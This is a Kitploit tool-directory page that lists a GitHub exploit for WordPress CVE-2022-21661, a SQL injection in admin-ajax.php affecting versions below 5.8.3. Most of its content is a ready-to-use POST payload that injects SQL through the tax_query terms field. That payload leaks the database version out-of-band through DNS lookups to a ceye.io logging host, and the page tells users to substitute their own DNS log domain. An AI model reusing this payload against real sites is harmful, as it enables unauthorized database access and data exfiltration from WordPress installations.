Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/purple-wl/wordpress-cve-2022-21661
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubpurple-wl/wordpress-cve-2022-21661

wordpress-CVE-2022-21661

Exploit for WordPress CVE-2022-21661 SQL injection vulnerability in admin-ajax.php, using out-of-band data exfiltration via DNS for versions below 5.8.3.

View Repository
17544 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

wordpress-CVE-2022-21661

#version<5.8.3

path:http://your target/wp-admin/admin-ajax.php

The injection type is out-of-band, you need to specify dnslog yourself and replace ceye.io

POST- DATA:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}

Download Tool